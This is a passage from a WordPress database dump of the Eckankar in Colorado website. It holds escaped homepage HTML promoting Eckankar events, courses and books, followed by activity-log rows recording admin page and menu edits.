data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243010,41197,'_message_key','post_updated'),(243011,41197,'_user_id','2'),(243012,41197,'_user_login','S8zhaBda'),(243013,41197,'_user_email','nada@zipnadanot.org'),(243014,41197,'_server_remote_addr','76.130.120.x'),(243015,41197,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(243016,41198,'post_id','268667'),(243017,41198,'post_type','mec_calendars'),(243018,41198,'post_title','Carousel &#8211; Liquid Layout View'),(243019,41198,'_message_key','post_updated'),(243020,41198,'_user_id','2'),(243021,41198,'_user_login','S8zhaBda'),(243022,41198,'_user_email','nada@zipnadanot.org'),(243023,41198,'_server_remote_addr','76.130.120.x'),(243024,41198,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268667&action=edit'),(243025,41199,'post_id','268667'),(243026,41199,'post_type','mec_calendars'),(243027,41199,'post_title','Carousel &#8211; Liquid Layout View'),(243028,41199,'_message_key','post_updated'),(243029,41199,'_user_id','2'),(243030,41199,'_user_login','S8zhaBda'),(243031,41199,'_user_email','nada@zipnadanot.org'),(243032,41199,'_server_remote_addr','76.130.120.x'),(243033,41199,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268667&action=edit'),(243034,41200,'setting_id','nav_menu_item[7245]'),(243035,41200,'setting_old_value','{\n    \"menu_item_parent\": 0,\n    \"object_id\": 7245,\n    \"object\": \"custom\",\n    \"type\": \"custom\",\n    \"type_label\": \"Custom Link\",\n    \"title\": \"Facebook\",\n    \"url\": \"https:\\/\\/www.facebook.com\\/Eckankar-in-Colorado-104663979586166\\/\",\n    \"target\": \"_blank\",\n    \"attr_title\": \"Facebook\",\n    \"description\": \"\",\n    \"classes\": \"facebook\",\n    \"xfn\": \"\",\n    \"nav_menu_term_id\": 8,\n    \"position\": 1,\n    \"status\": \"publish\",\n    \"original_title\": \"\",\n    \"_invalid\": false\n}'),(243036,41200,'setting_new_value','false'),(243037,41200,'control_id','nav_menu_item[7245]'),(243038,41200,'control_label','Facebook'),(243039,41200,'control_type','nav_menu_item'),(243040,41200,'_message_key','appearance_customized'),(243041,41200,'_user_id','2'),(243042,41200,'_user_login','S8zhaBda'),(243043,41200,'_user_email','nada@zipnadanot.org'),(243044,41200,'_server_remote_addr','76.130.120.x'),(243045,41200,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(243046,41201,'setting_id','nav_menu_item[7248]'),(243047,41201,'setting_old_value','{\n    \"menu_item_parent\": 0,\n    \"object_id\": 7248,\n    \"object\": \"custom\",\n    \"type\": \"custom\",\n    \"type_label\": \"Custom Link\",\n    \"title\": \"YouTube\",\n    \"url\": \"http:\\/\\/www.youtube.com\\/user\\/ECKANKAROfficialSite\",\n    \"target\": \"_blank\",\n    \"attr_title\": \"YouTube\",\n    \"description\": \"\",\n    \"classes\": \"youtube\",\n    \"xfn\": \"\",\n    \"nav_menu_term_id\": 8,\n    \"position\": 2,\n    \"status\": \"publish\",\n    \"original_title\": \"\",\n    \"_invalid\": false\n}'),(242999,41196,'_message_key','post_updated'),(243000,41196,'_user_id','2'),(243001,41196,'_user_login','S8zhaBda'),(243002,41196,'_user_email','nada@zipnadanot.org'),(243003,41196,'_server_remote_addr','76.130.120.x'),(243004,41196,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(243005,41197,'post_id','7160'),(243006,41197,'post_type','page'),(243007,41197,'post_title','Home'),(243008,41197,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" 